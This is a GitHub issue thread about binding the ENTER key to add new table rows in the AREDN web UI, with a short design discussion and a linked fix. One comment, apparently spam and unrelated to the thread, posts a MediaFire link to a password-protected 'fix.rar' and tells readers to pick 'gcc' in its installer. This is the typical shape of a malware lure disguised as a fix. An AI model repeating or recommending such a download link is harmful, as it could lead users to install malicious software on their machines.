aredn/aredn #1409: Use ENTER to create additional rows when adding to a table in the New UI

pmilazzo, 2024-08-26:
**Is your feature request related to a problem? Please describe.**
When entering multiple new entries in a table, such as tunnels, host aliases, or DHCP options, it is awkward to move off of keyboard input to press the [+] for each new row.

**Describe the solution you'd like**
- [ ] When focus is in one of the fields of a newly added row, bind ENTER to act just like the [+] button, adding an additional row and setting the focus to the first field of that row. That way, one could simply tab through the row filling out the fields, and then press ENTER to continue on the next row.

**Describe alternatives you've considered**
Repeated presses of the TAB key to reach the [+] button is another way to avoid moving off the keyboard, but it takes longer and requires significantly user attention because the TAB key moves&mdash;somewhat unpredictably&mdash;through all the currently active buttons and input fields.

**Additional context**
Enhancement https://github.com/aredn/aredn/issues/1408 is a prerequisite for this feature request.

ritiiq, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

pmilazzo, 2024-08-26:
Thanks; good questions!

- I think that if we restrict this binding of ENTER to just the new row, we sidestep the type ambiguity for services; the currently selected type and the type of the new row should be the same.
- If they are different it's presumably because the user just changed the currently selected type, so always using the currently selected type seems like the expected behavior.
- ENTER should work on any field in the new row (but see below). Some tables (e.g. tunnel definitions) have fields that are optional or have reasonable defaults, so we don't want to make the user tab through them if they don't need to be set. Common tabular applications (e.g. Excel) also behave this way.
- One possible exception is <select> fields, which by default bind ENTER to expand the list of options. SPACE and ALT+DOWN also expand the list of options, so losing ENTER doesn't completely break keyboard navigation, but it does defy expectations.

aanon4, 2024-08-27:
https://github.com/aredn/aredn/issues/1409

aanon4, 2024-08-27:
https://github.com/aredn/aredn/pull/1416

aanon4, 2024-08-29:
Assuming this bit is good.

pmilazzo, 2024-08-29:
Yes, it works just fine. Thanks!